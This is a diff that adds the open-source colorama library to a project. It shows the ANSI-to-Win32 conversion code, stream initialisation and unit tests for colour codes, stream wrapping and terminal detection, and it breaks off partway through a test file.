AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
|
||||
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
|
||||
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
|
||||
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
|
||||
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
|
||||
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
|
||||
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
|
||||
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
|
||||
}
|
||||
return dict()
|
||||
|
||||
def write(self, text):
|
||||
if self.strip or self.convert:
|
||||
self.write_and_convert(text)
|
||||
else:
|
||||
self.wrapped.write(text)
|
||||
self.wrapped.flush()
|
||||
if self.autoreset:
|
||||
self.reset_all()
|
||||
|
||||
|
||||
def reset_all(self):
|
||||
if self.convert:
|
||||
self.call_win32('m', (0,))
|
||||
elif not self.strip and not self.stream.closed:
|
||||
self.wrapped.write(Style.RESET_ALL)
|
||||
|
||||
|
||||
def write_and_convert(self, text):
|
||||
'''
|
||||
Write the given text to our wrapped stream, stripping any ANSI
|
||||
sequences from the text, and optionally converting them into win32
|
||||
calls.
|
||||
'''
|
||||
cursor = 0
|
||||
text = self.convert_osc(text)
|
||||
for match in self.ANSI_CSI_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
self.write_plain_text(text, cursor, start)
|
||||
self.convert_ansi(*match.groups())
|
||||
cursor = end
|
||||
self.write_plain_text(text, cursor, len(text))
|
||||
|
||||
|
||||
def write_plain_text(self, text, start, end):
|
||||
if start < end:
|
||||
self.wrapped.write(text[start:end])
|
||||
self.wrapped.flush()
|
||||
|
||||
|
||||
def convert_ansi(self, paramstring, command):
|
||||
if self.convert:
|
||||
params = self.extract_params(command, paramstring)
|
||||
self.call_win32(command, params)
|
||||
|
||||
|
||||
def extract_params(self, command, paramstring):
|
||||
if command in 'Hf':
|
||||
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
|
||||
while len(params) < 2:
|
||||
# defaults:
|
||||
params = params + (1,)
|
||||
else:
|
||||
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
|
||||
if len(params) == 0:
|
||||
# defaults:
|
||||
if command in 'JKm':
|
||||
params = (0,)
|
||||
elif command in 'ABCD':
|
||||
params = (1,)
|
||||
|
||||
return params
|
||||
|
||||
|
||||
def call_win32(self, command, params):
|
||||
if command == 'm':
|
||||
for param in params:
|
||||
if param in self.win32_calls:
|
||||
func_args = self.win32_calls[param]
|
||||
func = func_args[0]
|
||||
args = func_args[1:]
|
||||
kwargs = dict(on_stderr=self.on_stderr)
|
||||
func(*args, **kwargs)
|
||||
elif command in 'J':
|
||||
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'K':
|
||||
winterm.erase_line(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'Hf': # cursor position - absolute
|
||||
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
|
||||
elif command in 'ABCD': # cursor position - relative
|
||||
n = params[0]
|
||||
# A - up, B - down, C - forward, D - back
|
||||
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
|
||||
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
|
||||
|
||||
|
||||
def convert_osc(self, text):
|
||||
for match in self.ANSI_OSC_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
text = text[:start] + text[end:]
|
||||
paramstring, command = match.groups()
|
||||
if command in '\x07': # \x07 = BEL
|
||||
params = paramstring.split(";")
|
||||
# 0 - change title and icon (we will only change title)
|
||||
# 1 - change icon (we don't support this)
|
||||
# 2 - change title
|
||||
if params[0] in '02':
|
||||
winterm.set_title(params[1])
|
||||
return text
|
80
lib/colorama/initialise.py
Normal file
80
lib/colorama/initialise.py
Normal file
@ -0,0 +1,80 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import atexit
|
||||
import contextlib
|
||||
import sys
|
||||
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
|
||||
orig_stdout = None
|
||||
orig_stderr = None
|
||||
|
||||
wrapped_stdout = None
|
||||
wrapped_stderr = None
|
||||
|
||||
atexit_done = False
|
||||
|
||||
|
||||
def reset_all():
|
||||
if AnsiToWin32 is not None: # Issue #74: objects might become None at exit
|
||||
AnsiToWin32(orig_stdout).reset_all()
|
||||
|
||||
|
||||
def init(autoreset=False, convert=None, strip=None, wrap=True):
|
||||
|
||||
if not wrap and any([autoreset, convert, strip]):
|
||||
raise ValueError('wrap=False conflicts with any other arg=True')
|
||||
|
||||
global wrapped_stdout, wrapped_stderr
|
||||
global orig_stdout, orig_stderr
|
||||
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
|
||||
if sys.stdout is None:
|
||||
wrapped_stdout = None
|
||||
else:
|
||||
sys.stdout = wrapped_stdout = \
|
||||
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
|
||||
if sys.stderr is None:
|
||||
wrapped_stderr = None
|
||||
else:
|
||||
sys.stderr = wrapped_stderr = \
|
||||
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
|
||||
|
||||
global atexit_done
|
||||
if not atexit_done:
|
||||
atexit.register(reset_all)
|
||||
atexit_done = True
|
||||
|
||||
|
||||
def deinit():
|
||||
if orig_stdout is not None:
|
||||
sys.stdout = orig_stdout
|
||||
if orig_stderr is not None:
|
||||
sys.stderr = orig_stderr
|
||||
|
||||
|
||||
@contextlib.contextmanager
|
||||
def colorama_text(*args, **kwargs):
|
||||
init(*args, **kwargs)
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
deinit()
|
||||
|
||||
|
||||
def reinit():
|
||||
if wrapped_stdout is not None:
|
||||
sys.stdout = wrapped_stdout
|
||||
if wrapped_stderr is not None:
|
||||
sys.stderr = wrapped_stderr
|
||||
|
||||
|
||||
def wrap_stream(stream, convert, strip, autoreset, wrap):
|
||||
if wrap:
|
||||
wrapper = AnsiToWin32(stream,
|
||||
convert=convert, strip=strip, autoreset=autoreset)
|
||||
if wrapper.should_wrap():
|
||||
stream = wrapper.stream
|
||||
return stream
|
1
lib/colorama/tests/__init__.py
Normal file
1
lib/colorama/tests/__init__.py
Normal file
@ -0,0 +1 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
76
lib/colorama/tests/ansi_test.py
Normal file
76
lib/colorama/tests/ansi_test.py
Normal file
@ -0,0 +1,76 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import sys
|
||||
from unittest import TestCase, main
|
||||
|
||||
from ..ansi import Back, Fore, Style
|
||||
from ..ansitowin32 import AnsiToWin32
|
||||
|
||||
stdout_orig = sys.stdout
|
||||
stderr_orig = sys.stderr
|
||||
|
||||
|
||||
class AnsiTest(TestCase):
|
||||
|
||||
def setUp(self):
|
||||
# sanity check: stdout should be a file or StringIO object.
|
||||
# It will only be AnsiToWin32 if init() has previously wrapped it
|
||||
self.assertNotEqual(type(sys.stdout), AnsiToWin32)
|
||||
self.assertNotEqual(type(sys.stderr), AnsiToWin32)
|
||||
|
||||
def tearDown(self):
|
||||
sys.stdout = stdout_orig
|
||||
sys.stderr = stderr_orig
|
||||
|
||||
|
||||
def testForeAttributes(self):
|
||||
self.assertEqual(Fore.BLACK, '\033[30m')
|
||||
self.assertEqual(Fore.RED, '\033[31m')
|
||||
self.assertEqual(Fore.GREEN, '\033[32m')
|
||||
self.assertEqual(Fore.YELLOW, '\033[33m')
|
||||
self.assertEqual(Fore.BLUE, '\033[34m')
|
||||
self.assertEqual(Fore.MAGENTA, '\033[35m')
|
||||
self.assertEqual(Fore.CYAN, '\033[36m')
|
||||
self.assertEqual(Fore.WHITE, '\033[37m')
|
||||
self.assertEqual(Fore.RESET, '\033[39m')
|
||||
|
||||
# Check the light, extended versions.
|
||||
self.assertEqual(Fore.LIGHTBLACK_EX, '\033[90m')
|
||||
self.assertEqual(Fore.LIGHTRED_EX, '\033[91m')
|
||||
self.assertEqual(Fore.LIGHTGREEN_EX, '\033[92m')
|
||||
self.assertEqual(Fore.LIGHTYELLOW_EX, '\033[93m')
|
||||
self.assertEqual(Fore.LIGHTBLUE_EX, '\033[94m')
|
||||
self.assertEqual(Fore.LIGHTMAGENTA_EX, '\033[95m')
|
||||
self.assertEqual(Fore.LIGHTCYAN_EX, '\033[96m')
|
||||
self.assertEqual(Fore.LIGHTWHITE_EX, '\033[97m')
|
||||
|
||||
|
||||
def testBackAttributes(self):
|
||||
self.assertEqual(Back.BLACK, '\033[40m')
|
||||
self.assertEqual(Back.RED, '\033[41m')
|
||||
self.assertEqual(Back.GREEN, '\033[42m')
|
||||
self.assertEqual(Back.YELLOW, '\033[43m')
|
||||
self.assertEqual(Back.BLUE, '\033[44m')
|
||||
self.assertEqual(Back.MAGENTA, '\033[45m')
|
||||
self.assertEqual(Back.CYAN, '\033[46m')
|
||||
self.assertEqual(Back.WHITE, '\033[47m')
|
||||
self.assertEqual(Back.RESET, '\033[49m')
|
||||
|
||||
# Check the light, extended versions.
|
||||
self.assertEqual(Back.LIGHTBLACK_EX, '\033[100m')
|
||||
self.assertEqual(Back.LIGHTRED_EX, '\033[101m')
|
||||
self.assertEqual(Back.LIGHTGREEN_EX, '\033[102m')
|
||||
self.assertEqual(Back.LIGHTYELLOW_EX, '\033[103m')
|
||||
self.assertEqual(Back.LIGHTBLUE_EX, '\033[104m')
|
||||
self.assertEqual(Back.LIGHTMAGENTA_EX, '\033[105m')
|
||||
self.assertEqual(Back.LIGHTCYAN_EX, '\033[106m')
|
||||
self.assertEqual(Back.LIGHTWHITE_EX, '\033[107m')
|
||||
|
||||
|
||||
def testStyleAttributes(self):
|
||||
self.assertEqual(Style.DIM, '\033[2m')
|
||||
self.assertEqual(Style.NORMAL, '\033[22m')
|
||||
self.assertEqual(Style.BRIGHT, '\033[1m')
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
208
lib/colorama/tests/ansitowin32_test.py
Normal file
208
lib/colorama/tests/ansitowin32_test.py
Normal file
@ -0,0 +1,208 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from io import StringIO
|
||||
from unittest import TestCase, main
|
||||
|
||||
from mock import MagicMock, Mock, patch
|
||||
|
||||
from ..ansitowin32 import AnsiToWin32, StreamWrapper
|
||||
from .utils import osname
|
||||
|
||||
|
||||
class StreamWrapperTest(TestCase):
|
||||
|
||||
def testIsAProxy(self):
|
||||
mockStream = Mock()
|
||||
wrapper = StreamWrapper(mockStream, None)
|
||||
self.assertTrue( wrapper.random_attr is mockStream.random_attr )
|
||||
|
||||
def testDelegatesWrite(self):
|
||||
mockStream = Mock()
|
||||
mockConverter = Mock()
|
||||
wrapper = StreamWrapper(mockStream, mockConverter)
|
||||
wrapper.write('hello')
|
||||
self.assertTrue(mockConverter.write.call_args, (('hello',), {}))
|
||||
|
||||
def testDelegatesContext(self):
|
||||
mockConverter = Mock()
|
||||
s = StringIO()
|
||||
with StreamWrapper(s, mockConverter) as fp:
|
||||
fp.write(u'hello')
|
||||
self.assertTrue(s.closed)
|
||||
|
||||
def testProxyNoContextManager(self):
|
||||
mockStream = MagicMock()
|
||||
mockStream.__enter__.side_effect = AttributeError()
|
||||
mockConverter = Mock()
|
||||
with self.assertRaises(AttributeError) as excinfo:
|
||||
with StreamWrapper(mockStream, mockConverter) as wrapper:
|
||||
wrapper.write('hello')
|
||||
|
||||
|
||||
class AnsiToWin32Test(TestCase):
|
||||
|
||||
def testInit(self):
|
||||
mockStdout = Mock()
|
||||
auto = Mock()
|
||||
stream = AnsiToWin32(mockStdout, autoreset=auto)
|
||||
self.assertEqual(stream.wrapped, mockStdout)
|
||||
self.assertEqual(stream.autoreset, auto)
|
||||
|
||||
@patch('colorama.ansitowin32.winterm', None)
|
||||
@patch('colorama.ansitowin32.winapi_test', lambda *_: True)
|
||||
def testStripIsTrueOnWindows(self):
|
||||
with osname('nt'):
|
||||
mockStdout = Mock()
|
||||
stream = AnsiToWin32(mockStdout)
|
||||
self.assertTrue(stream.strip)
|
||||
|
||||
def testStripIsFalseOffWindows(self):
|
||||
with osname('posix'):
|
||||
mockStdout = Mock(closed=False)
|
||||
stream = AnsiToWin32(mockStdout)
|
||||
self.assertFalse(stream.strip)
|
||||
|
||||
def testWriteStripsAnsi(self):
|
||||
mockStdout = Mock()
|
||||
stream = AnsiToWin32(mockStdout)
|
||||
stream.wrapped = Mock()
|
||||
stream.write_and_convert = Mock()
|
||||
stream.strip = True
|
||||
|
||||
stream.write('abc')
|
||||
|
||||
self.assertFalse(stream.wrapped.write.called)
|
||||
self.assertEqual(stream.write_and_convert.call_args, (('abc',), {}))
|
||||
|
||||
def testWriteDoesNotStripAnsi(self):
|
||||
mockStdout = Mock()
|
||||
stream = AnsiToWin32(mockStdout)
|
||||
stream.wrapped = Mock()
|
||||
stream.write_and_convert = Mock()
|
||||
stream.strip = False
|
||||
stream.convert = False
|
||||
|
||||
stream.write('abc')
|
||||
|
||||
self.assertFalse(stream.write_and_convert.called)
|
||||
self.assertEqual(stream.wrapped.write.call_args, (('abc',), {}))
|
||||
|
||||
def assert_autoresets(self, convert, autoreset=True):
|
||||
stream = AnsiToWin32(Mock())
|
||||
stream.convert = convert
|
||||
stream.reset_all = Mock()
|
||||
stream.autoreset = autoreset
|
||||
stream.winterm = Mock()
|
||||
|
||||
stream.write('abc')
|
||||
|
||||
self.assertEqual(stream.reset_all.called, autoreset)
|
||||
|
||||
def testWriteAutoresets(self):
|
||||
self.assert_autoresets(convert=True)
|
||||
self.assert_autoresets(convert=False)
|
||||
self.assert_autoresets(convert=True, autoreset=False)
|
||||
self.assert_autoresets(convert=False, autoreset=False)
|
||||
|
||||
def testWriteAndConvertWritesPlainText(self):
|
||||
stream = AnsiToWin32(Mock())
|
||||
stream.write_and_convert( 'abc' )
|
||||
self.assertEqual( stream.wrapped.write.call_args, (('abc',), {}) )
|
||||
|
||||
def testWriteAndConvertStripsAllValidAnsi(self):
|
||||
stream = AnsiToWin32(Mock())
|
||||
stream.call_win32 = Mock()
|
||||
data = [
|
||||
'abc\033[mdef',
|
||||
'abc\033[0mdef',
|
||||
'abc\033[2mdef',
|
||||
'abc\033[02mdef',
|
||||
'abc\033[002mdef',
|
||||
'abc\033[40mdef',
|
||||
'abc\033[040mdef',
|
||||
'abc\033[0;1mdef',
|
||||
'abc\033[40;50mdef',
|
||||
'abc\033[50;30;40mdef',
|
||||
'abc\033[Adef',
|
||||
'abc\033[0Gdef',
|
||||
'abc\033[1;20;128Hdef',
|
||||
]
|
||||
for datum in data:
|
||||
stream.wrapped.write.reset_mock()
|
||||
stream.write_and_convert( datum )
|
||||
self.assertEqual(
|
||||
[args[0] for args in stream.wrapped.write.call_args_list],
|
||||
[ ('abc',), ('def',) ]
|
||||
)
|
||||
|
||||
def testWriteAndConvertSkipsEmptySnippets(self):
|
||||
stream = AnsiToWin32(Mock())
|
||||
stream.call_win32 = Mock()
|
||||
stream.write_and_convert( '\033[40m\033[41m' )
|
||||
self.assertFalse( stream.wrapped.write.called )
|
||||
|
||||
def testWriteAndConvertCallsWin32WithParamsAndCommand(self):
|
||||
stream = AnsiToWin32(Mock())
|
||||
stream.convert = True
|
||||
stream.call_win32 = Mock()
|
||||
stream.extract_params = Mock(return_value='params')
|
||||
data = {
|
||||
'abc\033[adef': ('a', 'params'),
|
||||
'abc\033[;;bdef': ('b', 'params'),
|
||||
'abc\033[0cdef': ('c', 'params'),
|
||||
'abc\033[;;0;;Gdef': ('G', 'params'),
|
||||
'abc\033[1;20;128Hdef': ('H', 'params'),
|
||||
}
|
||||
for datum, expected in data.items():
|
||||
stream.call_win32.reset_mock()
|
||||
stream.write_and_convert( datum )
|
||||
self.assertEqual( stream.call_win32.call_args[0], expected )
|
||||
|
||||
def test_reset_all_shouldnt_raise_on_closed_orig_stdout(self):
|
||||
stream = StringIO()
|
||||
converter = AnsiToWin32(stream)
|
||||
stream.close()
|
||||
|
||||
converter.reset_all()
|
||||
|
||||
def test_wrap_shouldnt_raise_on_closed_orig_stdout(self):
|
||||
stream = StringIO()
|
||||
stream.close()
|
||||
converter = AnsiToWin32(stream)
|
||||
self.assertFalse(converter.strip)
|
||||
self.assertFalse(converter.convert)
|
||||
|
||||
def test_wrap_shouldnt_raise_on_missing_closed_attr(self):
|
||||
converter = AnsiToWin32(object())
|
||||
self.assertFalse(converter.strip)
|
||||
self.assertFalse(converter.convert)
|
||||
|
||||
def testExtractParams(self):
|
||||
stream = AnsiToWin32(Mock())
|
||||
data = {
|
||||
'': (0,),
|
||||
';;': (0,),
|
||||
'2': (2,),
|
||||
';;002;;': (2,),
|
||||
'0;1': (0, 1),
|
||||
';;003;;456;;': (3, 456),
|
||||
'11;22;33;44;55': (11, 22, 33, 44, 55),
|
||||
}
|
||||
for datum, expected in data.items():
|
||||
self.assertEqual(stream.extract_params('m', datum), expected)
|
||||
|
||||
def testCallWin32UsesLookup(self):
|
||||
listener = Mock()
|
||||
stream = AnsiToWin32(listener)
|
||||
stream.win32_calls = {
|
||||
1: (lambda *_, **__: listener(11),),
|
||||
2: (lambda *_, **__: listener(22),),
|
||||
3: (lambda *_, **__: listener(33),),
|
||||
}
|
||||
stream.call_win32('m', (3, 1, 99, 2))
|
||||
self.assertEqual(
|
||||
[a[0][0] for a in listener.call_args_list],
|
||||
[33, 11, 22] )
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
123
lib/colorama/tests/initialise_test.py
Normal file
123
lib/colorama/tests/initialise_test.py
Normal file
@ -0,0 +1,123 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import os
|
||||
import sys
|
||||
from unittest import TestCase, main
|
||||
|
||||
from mock import patch
|
||||
|
||||
from ..ansitowin32 import StreamWrapper
|
||||
from ..initialise import init
|
||||
from .utils import osname, redirected_output, replace_by
|
||||
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
|
||||
|
||||
class InitTest(TestCase):
|
||||
|
||||
def setUp(self):
|
||||
# sanity check
|
||||
self.assertNotWrapped()
|
||||
|
||||
def tearDown(self):
|
||||
sys.stdout = orig_stdout
|
||||
sys.stderr = orig_stderr
|
||||
|
||||
def assertWrapped(self):
|
||||
self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped')
|
||||
self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped')
|
||||
self.assertTrue(isinstance(sys.stdout, StreamWrapper),
|
||||
'bad stdout wrapper')
|
||||
self.assertTrue(isinstance(sys.stderr, StreamWrapper),
|
||||
'bad stderr wrapper')
|
||||
|
||||
def assertNotWrapped(self):
|
||||
self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped')
|
||||
self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped')
|
||||
|
||||
@patch('colorama.initialise.reset_all')
|
||||
@patch('colorama.ansitowin32.winapi_test', lambda *_: True)
|
||||
def testInitWrapsOnWindows(self, _):
|
||||
with osname("nt"):
|
||||
init()
|
||||
self.assertWrapped()
|
||||
|
||||
@patch('colorama.initialise.reset_all')
|
||||
@patch('colorama.ansitowin32.winapi_test', lambda *_: False)
|
||||
def testInitDoesntWrapOnEmulatedWindows(self, _):
|
||||
with osname("nt"):
|
||||
init()
|
||||
self.assertNotWrapped()
|
||||
|
||||
def testInitDoesntWrapOnNonWindows(self):
|
||||
with osname("posix"):
|
||||
init()
|
||||
self.assertNotWrapped()
|
||||
|
||||
def testInitDoesntWrapIfNone(self):
|
||||
with replace_by(None):
|
||||
init()
|
||||
# We can't use assertNotWrapped here because replace_by(None)
|
||||
# changes stdout/stderr already.
|
||||
self.assertIsNone(sys.stdout)
|
||||
self.assertIsNone(sys.stderr)
|
||||
|
||||
def testInitAutoresetOnWrapsOnAllPlatforms(self):
|
||||
with osname("posix"):
|
||||
init(autoreset=True)
|
||||
self.assertWrapped()
|
||||
|
||||
def testInitWrapOffDoesntWrapOnWindows(self):
|
||||
with osname("nt"):
|
||||
init(wrap=False)
|
||||
self.assertNotWrapped()
|
||||
|
||||
def testInitWrapOffIncompatibleWithAutoresetOn(self):
|
||||
self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False))
|
||||
|
||||
@patch('colorama.ansitowin32.winterm', None)
|
||||
@patch('colorama.ansitowin32.winapi_test', lambda *_: True)
|
||||
def testInitOnlyWrapsOnce(self):
|
||||
with osname("nt"):
|
||||
init()
|
||||
init()
|
||||
self.assertWrapped()
|
||||
|
||||
@patch('colorama.win32.SetConsoleTextAttribute')
|
||||
@patch('colorama.initialise.AnsiToWin32')
|
||||
def testAutoResetPassedOn(self, mockATW32, _):
|
||||
with osname("nt"):
|
||||
init(autoreset=True)
|
||||
self.assertEqual(len(mockATW32.call_args_list), 2)
|
||||
self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True)
|
||||
self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True)
|
||||
|
||||
@patch('colorama.initialise.AnsiToWin32')
|
||||
def testAutoResetChangeable(self, mockATW32):
|
||||
with osname("nt"):
|
||||
init()
|
||||
|
||||
init(autoreset=True)
|
||||
self.assertEqual(len(mockATW32.call_args_list), 4)
|
||||
self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True)
|
||||
self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True)
|
||||
|
||||
init()
|
||||
self.assertEqual(len(mockATW32.call_args_list), 6)
|
||||
self.assertEqual(
|
||||
mockATW32.call_args_list[4][1]['autoreset'], False)
|
||||
self.assertEqual(
|
||||
mockATW32.call_args_list[5][1]['autoreset'], False)
|
||||
|
||||
|
||||
@patch('colorama.initialise.atexit.register')
|
||||
def testAtexitRegisteredOnlyOnce(self, mockRegister):
|
||||
init()
|
||||
self.assertTrue(mockRegister.called)
|
||||
mockRegister.reset_mock()
|
||||
init()
|
||||
self.assertFalse(mockRegister.called)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
57
lib/colorama/tests/isatty_test.py
Normal file
57
lib/colorama/tests/isatty_test.py
Normal file
@ -0,0 +1,57 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import sys
|
||||
from unittest import TestCase, main
|
||||
|
||||
from ..ansitowin32 import StreamWrapper, AnsiToWin32
|
||||
from .utils import pycharm, replace_by, replace_original_by, StreamTTY, StreamNonTTY
|
||||
|
||||
|
||||
def is_a_tty(stream):
|
||||
return StreamWrapper(stream, None).isatty()
|
||||
|
||||
class IsattyTest(TestCase):
|
||||
|
||||
def test_TTY(self):
|
||||
tty = StreamTTY()
|
||||
self.assertTrue(is_a_tty(tty))
|
||||
with pycharm():
|
||||
self.assertTrue(is_a_tty(tty))
|
||||
|
||||
def test_nonTTY(self):
|
||||
non_tty = StreamNonTTY()
|
||||
self.assertFalse(is_a_tty(non_tty))
|
||||
with pycharm():
|
||||
self.assertFalse(is_a_tty(non_tty))
|
||||
|
||||
def test_withPycharm(self):
|
||||
with pycharm():
|
||||
self.assertTrue(is_a_tty(sys.stderr))
|
||||
self.assertTrue(is_a_tty(sys.stdout))
|
||||
|
||||
def test_withPycharmTTYOverride(self):
|
||||
tty = StreamTTY()
|
||||
with pycharm(), replace_by(tty):
|
||||
self.assertTrue(is_a_tty(tty))
|
||||
|
||||
def test_withPycharmNonTTYOverride(self):
|
||||
non_tty = StreamNonTTY()
|
||||
with pycharm(), replace_by(non_tty):
|
||||
self.assertFalse(is_a_tty(non_tty))
|
||||
|
||||
def test_withPycharmNoneOverride(self):
|
||||
with pycharm():
|
||||
with replace_by(None), replace_original_by(None):
|
||||
self.assertFalse(is_a_tty(None))
|
||||
self.assertFalse(is_a_tty(StreamNonTTY()))
|
||||
self.assertTrue(is_a_tty(StreamTTY()))
|
||||
|
||||
def test_withPycharmStreamWrapped(self):
|
||||
with pycharm():
|
||||
self.assertTrue(AnsiToWin32(StreamTTY()).stream.isatty())
|
||||
self.assertFalse(AnsiToWin32(StreamNonTTY()).stream.isatty())
|
||||
self.assertTrue(AnsiToWin32(sys.stdout).stream.isatty())
|
||||
self.assertTrue(AnsiToWin32(sys.stderr).stream.isatty())
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
58
lib/colorama/tests/utils.py
Normal file
58
lib/colorama/tests/utils.py
Normal file
@ -0,0 +1,58 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from contextlib import contextmanager
|
||||
from io import StringIO
|
||||
import sys
|
||||
import os
|
||||
|
||||
from mock import Mock
|
||||
|
||||
class StreamTTY(StringIO):
|
||||
def isatty(self):
|
||||
return True
|
||||
|
||||
class StreamNonTTY(StringIO):
|
||||
def isatty(self):
|
||||
return False
|
||||
|
||||
@contextmanager
|
||||
def osname(name):
|
||||
orig = os.name
|
||||
os.name = name
|
||||
yield
|
||||
os.name = orig
|
||||
|
||||
@contextmanager
|
||||
def redirected_output():
|
||||
orig = sys.stdout
|
||||
sys.stdout = Mock()
|
||||
sys.stdout.isatty = lambda: False
|
||||
yield
|
||||
sys.stdout = orig
|
||||
|
||||
@contextmanager
|
||||
def replace_by(stream):
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
sys.stdout = stream
|
||||
sys.stderr = stream
|
||||
yield
|
||||
sys.stdout = orig_stdout
|
||||
sys.stderr = orig_stderr
|
||||
|
||||
@contextmanager
|
||||
def replace_original_by(stream):
|
||||
orig_stdout = sys.__stdout__
|
||||
orig_stderr = sys.__stderr__
|
||||
sys.__stdout__ = stream
|
||||
sys.__stderr__ = stream
|
||||
yield
|
||||
sys.__stdout__ = orig_stdout
|
||||
sys.__stderr__ = orig_stderr
|
||||
|
||||
@contextmanager
|
||||
def pycharm():
|
||||
os.environ["PYCHARM_HOSTED"] = "1"
|
||||
non_tty = StreamNonTTY()
|
||||
with replace_by(non_tty), replace_original_by(non_tty):
|
||||
yield
|
||||
del os.environ["PYCHARM_HOSTED"]
|
128
lib/colorama/tests/winterm_test.py
Normal file
128
lib/colorama/tests/winterm_test.py
Normal file
@ -0,0 +1,128 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import sys
|
||||
from unittest import TestCase, main, skipUnless
|
||||
|
||||
from mock import Mock, patch
|
||||
|
||||
from ..winterm import WinColor, WinStyle, WinTerm
|
||||
|
||||
|
||||
class WinTermTest(TestCase):
|
||||
|
||||
@patch('colorama.winterm.win32')
|
||||
def testInit(self, mockWin32):
|
||||
mockAttr = Mock()
|
||||
mockAttr.wAttributes = 7 + 6 * 16 + 8
|
||||
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
|
||||
term = WinTerm()
|
||||
self.assertEqual(term._fore, 7)
|
||||
self.assertEqual(term._back, 6)
|
||||
self.assertEqual(term._style, 8)
|
||||
|
||||
@skipUnless(sys.platform.startswith("win"), "requires Windows")
|
||||
def testGetAttrs(self):
|
||||
term = WinTerm()
|
||||
|
||||
term._fore = 0
|
||||
term._back = 0
|
||||
term._style = 0
|
||||
self.assertEqual(term.get_attrs(), 0)
|
||||
|
||||
term._fore = WinColor.YELLOW
|
||||
self.assertEqual(term.get_attrs(), WinColor.YELLOW)
|
||||
|
||||
term._back = WinColor.MAGENTA
|
||||
self.assertEqual(
|
||||
term.get_attrs(),
|
||||
WinColor.YELLOW + WinColor.MAGENTA * 16)
|
||||
|
||||
term._style = WinStyle.BRIGHT
|
||||
self.assertEqual(
|
||||
term.get_attrs(),
|
||||
WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT)
|
||||
|
||||
@patch('colorama.winterm.win32')
|
||||
def testResetAll(self, mockWin32):
|
||||
mockAttr = Mock()
|
||||
mockAttr.wAttributes = 1 + 2 * 16 + 8
|
||||
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
|
||||
term = WinTerm()
|
||||
|
||||
term.set_console = Mock()
|
||||
term._fore = -1
|
||||
term._back = -1
|
||||
term._style = -1
|
||||
|
||||
term.reset_all()
|
||||
|
||||
self.assertEqual(term._fore, 1)
|
||||
self.assertEqual(term._back, 2)
|
||||
self.assertEqual(term._style, 8)
|
||||
self.assertEqual(term.set_console.called, True)
|
||||
|
||||
@skipUnless(sys.platform.startswith("win"), "requires Windows")
|
||||
def testFore(self):
|
||||
term = WinTerm()
|
||||
term.set_console = Mock()
|
||||
term._fore = 0
|
||||
|
||||
term.fore(5)
|
||||
|
||||
self.assertEqual(term._fore, 5)
|
||||
self.assertEqual(term.set_console.called, True)
|
||||
|
||||
@skipUnless(sys.platform.startswith("win"), "requires Windows")
|
||||
def testBack(self):
|
||||
term = WinTerm()
|
||||
term.set_console = Mock()
|
||||
term._back = 0
|
||||
|
||||
term.back(5)
|
||||
|
||||
self.assertEqual(term._back, 5)
|
||||
self.assertEqual(term.set_console.called, True)
|
||||
|
||||
@skipUnless(sys.platform.startswith("win"), "requires Windows")
|
||||
def testStyle(self):
|
||||
term = WinTerm()
|
||||
term.set_console = Mock()
|
||||
term._style = 0
|
||||
|
||||
term.style(22)
|
||||
|
||||
self.assertEqual(term._style, 22)
|
||||
self.assertEqual(term.set_console.called, True)
|
||||
|
||||
@patch('colorama.winterm.win32')
|
||||
